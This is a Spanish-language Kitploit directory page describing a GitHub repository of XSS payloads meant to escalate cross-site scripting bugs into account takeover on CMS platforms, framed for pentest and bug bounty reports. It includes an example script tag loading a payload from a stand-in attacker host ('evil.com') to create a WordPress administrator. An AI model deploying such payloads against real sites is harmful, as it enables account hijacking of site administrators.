Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
weaponised-XSS-payloads — XSS payloads designed to turn alert(1) into P1 | Kitploit
Herramientas/GitHubGitHub/hakluke/weaponised-xss-payloads
Payload GenerationExploitationWeb Application ExploitationWeb SecurityPenetration TestingPayload Development
GitHubhakluke/weaponised-xss-payloads

weaponised-XSS-payloads

XSS payloads designed to turn alert(1) into P1

Ver Repositorio
1.4k222hace 2 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Payloads de XSS armados

Payloads XSS diseñados para convertir alert(1) en un P1.

La entrada del blog

Este repositorio se publicó junto con un artículo de blog titulado "How to Upgrade Your XSS Bugs from Medium to Critical" https://medium.com/@hakluke/upgrade-xss-from-medium-to-critical-cb96597b6cc4

¿Qué es esto?

En este repositorio encontrarás un montón de archivos JavaScript que se pueden cargar en un payload XSS para realizar funciones sensibles en plataformas CMS populares dentro del contexto del navegador de la víctima. Esto puede ayudar a encadenar un simple bug XSS con algo más crítico, como la toma de control de una cuenta.

Es perfecto para reforzar la severidad de un informe de pentest o bug bounty demostrando un impacto de seguridad real.

Los payloads se van añadiendo poco a poco, a medida que tengo tiempo. Aún quedan muchos más por venir; si puedes ayudar, ¡las pull requests son bienvenidas! Si buscas inspiración sobre qué crear, consulta la pestaña de "issues" de este repositorio.

Cómo usar

La forma más sencilla de usar estos payloads es alojarlos en algún lugar y cargarlos en el atributo src de una etiqueta script para tu payload XSS, así:

root@kitploit:~
<script src="http://evil.com/wordpress_create_admin_user.js"></script>

Alternativamente, dependiendo del contexto y la longitud del payload, a veces puede ser minificado, codificado y luego simplemente incluido directamente en la petición.

Para alojar el archivo JavaScript, puede que necesites establecer el Content-Type a application/javascript. Para lograrlo con PHP, simplemente añade esta línea al principio de cualquiera de los payloads, guárdalo como un archivo .php y alójalo en tu servidor web con PHP habilitado:

root@kitploit:~
<?php header("Content-Type: application/javascript"); ?>

Créditos

Este artículo de Shift8 es lo que me inspiró a crear este repositorio. El JS del artículo tiene un par de errores tipográficos menores, pero los conceptos son muy acertados.

Descargar herramienta